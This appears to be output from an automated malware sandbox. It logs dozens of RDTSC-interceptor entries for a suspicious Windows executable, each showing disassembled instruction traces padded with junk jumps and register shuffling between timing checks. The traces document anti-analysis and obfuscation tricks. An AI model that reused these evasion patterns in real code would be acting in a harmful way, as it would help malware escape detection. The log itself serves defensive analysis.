                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770647 second address: 5770656 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770656 second address: 57706E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F6644F246EEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 jmp 00007F6644F246EDh 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b jmp 00007F6644F246EEh 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F6644F246EAh 0x00000028 or eax, 7059FB78h 0x0000002e jmp 00007F6644F246EBh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007F6644F246F9h 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov esi, edx 0x00000041 push ebx 0x00000042 pop esi 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57706E7 second address: 5770702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DAE7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770702 second address: 5770728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6644F246F7h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770728 second address: 5770745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770745 second address: 577074B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 577074B second address: 5770761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F664452DADBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770761 second address: 57707BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov di, A196h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6644F246F3h 0x00000017 sub si, EE1Eh 0x0000001c jmp 00007F6644F246F9h 0x00000021 popfd 0x00000022 jmp 00007F6644F246F0h 0x00000027 popad 0x00000028 push dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57707BF second address: 57707C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57707C3 second address: 57707E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57707E0 second address: 57707E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770899 second address: 57708D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a leave 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6644F246F1h 0x00000014 sbb ch, FFFFFFF6h 0x00000017 jmp 00007F6644F246F1h 0x0000001c popfd 0x0000001d mov eax, 0CC24AE7h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57708D4 second address: 57601DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F664452DAE3h 0x00000009 or ax, C32Eh 0x0000000e jmp 00007F664452DAE9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F664452DAE0h 0x0000001a adc esi, 2630D8A8h 0x00000020 jmp 00007F664452DADBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 retn 0004h 0x0000002c nop 0x0000002d cmp eax, 00000000h 0x00000030 setne al 0x00000033 jmp 00007F664452DAD2h 0x00000035 xor ebx, ebx 0x00000037 test al, 01h 0x00000039 jne 00007F664452DAD7h 0x0000003b sub esp, 04h 0x0000003e mov dword ptr [esp], 0000000Dh 0x00000045 call 00007F6648DFB291h 0x0000004a mov edi, edi 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F664452DADDh 0x00000054 mov di, cx 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57601DC second address: 5760263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6644F246EEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 mov si, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F6644F246EFh 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F6644F246EBh 0x00000026 sbb ax, 985Eh 0x0000002b jmp 00007F6644F246F9h 0x00000030 popfd 0x00000031 popad 0x00000032 sub esp, 2Ch 0x00000035 jmp 00007F6644F246EEh 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F6644F246EAh 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760263 second address: 5760272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760272 second address: 576028A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576028A second address: 576028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576028E second address: 57602B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6644F246EEh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, BB30h 0x00000016 mov dh, 5Ah 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57602B0 second address: 57602B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57602B6 second address: 57602BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760331 second address: 5760356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760356 second address: 576036E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576036E second address: 57603BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4529A2D4h 0x00000008 call 00007F664452DADDh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov edi, 00000000h 0x00000016 jmp 00007F664452DADCh 0x0000001b inc ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F664452DADCh 0x00000025 sub ax, B9B8h 0x0000002a jmp 00007F664452DADBh 0x0000002f popfd 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57603BA second address: 57603E2 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 mov si, 2BE7h 0x0000000c pop eax 0x0000000d popad 0x0000000e test al, al 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6644F246F6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57603E2 second address: 576043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F664452DD2Fh 0x0000000f pushad 0x00000010 mov bx, ax 0x00000013 push ecx 0x00000014 mov dx, 4742h 0x00000018 pop edx 0x00000019 popad 0x0000001a lea ecx, dword ptr [ebp-14h] 0x0000001d pushad 0x0000001e call 00007F664452DAE4h 0x00000023 mov di, cx 0x00000026 pop eax 0x00000027 mov cx, dx 0x0000002a popad 0x0000002b mov dword ptr [ebp-14h], edi 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F664452DAE4h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576048F second address: 57604EA instructions: 0x00000000 rdtsc 0x00000002 mov cx, E0C5h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6644F246EAh 0x00000014 sbb cl, 00000058h 0x00000017 jmp 00007F6644F246EBh 0x0000001c popfd 0x0000001d jmp 00007F6644F246F8h 0x00000022 popad 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6644F246F7h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760513 second address: 5760519 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760519 second address: 576052E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576052E second address: 5760532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760532 second address: 576056E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F6644F246F9h 0x00000013 adc ch, FFFFFFC6h 0x00000016 jmp 00007F6644F246F1h 0x0000001b popfd 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576056E second address: 5760579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov di, ax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760579 second address: 576059E instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 jg 00007F66B53E25F1h 0x0000000e jmp 00007F6644F246EBh 0x00000013 js 00007F6644F2479Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576059E second address: 57605B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57605B9 second address: 576060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6644F246ECh 0x00000013 jmp 00007F6644F246F5h 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6644F246EEh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576060D second address: 5760678 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F664452DAE2h 0x00000008 add ch, FFFFFFE8h 0x0000000b jmp 00007F664452DADBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 jne 00007F66B49EB93Dh 0x0000001a jmp 00007F664452DAE6h 0x0000001f mov ebx, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 movzx eax, bx 0x00000026 mov esi, ebx 0x00000028 popad 0x00000029 lea eax, dword ptr [ebp-2Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F664452DAE7h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760678 second address: 576067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576067C second address: 5760682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760682 second address: 57606CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F6644F246F0h 0x0000000f push eax 0x00000010 jmp 00007F6644F246EBh 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6644F246F5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57606CF second address: 57606DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DADCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57606DF second address: 57606E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57606E3 second address: 5760716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, dh 0x0000000e pushfd 0x0000000f jmp 00007F664452DAE2h 0x00000014 sub si, 6528h 0x00000019 jmp 00007F664452DADBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760716 second address: 57607A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6644F246ECh 0x00000013 sub cx, F2B8h 0x00000018 jmp 00007F6644F246EBh 0x0000001d popfd 0x0000001e mov ecx, 15F15AEFh 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 call 00007F6644F246F0h 0x0000002b pushfd 0x0000002c jmp 00007F6644F246F2h 0x00000031 sub ah, 00000048h 0x00000034 jmp 00007F6644F246EBh 0x00000039 popfd 0x0000003a pop eax 0x0000003b mov eax, ebx 0x0000003d popad 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F6644F246F1h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 57607FA second address: 576081F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 576081F second address: 5760823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760823 second address: 5760827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760827 second address: 576082D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 576082D second address: 576003A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 17h 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F66B49EB8F4h 0x00000010 xor eax, eax 0x00000012 jmp 00007F664450720Ah 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a leave 0x0000001b retn 0004h 0x0000001e nop 0x0000001f xor ebx, ebx 0x00000021 cmp eax, 00000000h 0x00000024 je 00007F664452DC33h 0x0000002a call 00007F6648DFAF5Dh 0x0000002f mov edi, edi 0x00000031 pushad 0x00000032 mov bx, 3870h 0x00000036 jmp 00007F664452DAE9h 0x0000003b popad 0x0000003c xchg eax, ebp 0x0000003d pushad 0x0000003e movzx ecx, bx 0x00000041 mov ecx, edi 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F664452DADCh 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 576003A second address: 576003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 576003E second address: 5760044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760044 second address: 57600BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6644F246EFh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov esi, 439216DBh 0x00000016 movzx esi, bx 0x00000019 popad 0x0000001a push ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d mov esi, 5D026CCBh 0x00000022 pushfd 0x00000023 jmp 00007F6644F246F0h 0x00000028 adc eax, 1B883FD8h 0x0000002e jmp 00007F6644F246EBh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007F6644F246F6h 0x0000003d xor ax, 8A38h 0x00000042 jmp 00007F6644F246EBh 0x00000047 popfd 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 57600BE second address: 57600E6 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F664452DAE7h 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760144 second address: 5760197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E82Ah 0x00000007 pushfd 0x00000008 jmp 00007F6644F246EBh 0x0000000d adc eax, 468714CEh 0x00000013 jmp 00007F6644F246F9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c leave 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6644F246F8h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760197 second address: 576019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 576019D second address: 57601A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 57601A3 second address: 57601A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760CD9 second address: 5760CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760CDF second address: 5760CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760CE3 second address: 5760D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6644F246ECh 0x0000000f cmp dword ptr [75C7459Ch], 05h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D06 second address: 5760D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D0A second address: 5760D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D10 second address: 5760D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D16 second address: 5760D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D1A second address: 5760D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D1E second address: 5760D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F66B53D23BFh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6644F246F9h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D47 second address: 5760D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D4D second address: 5760D6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760D6D second address: 5760D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760E0E second address: 5760E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760E14 second address: 5760E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760E18 second address: 5760E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760E1C second address: 5760E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 55849819h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F664452DAE8h 0x00000017 mov ebx, eax 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760E49 second address: 5760E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 5760E57 second address: 5760E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
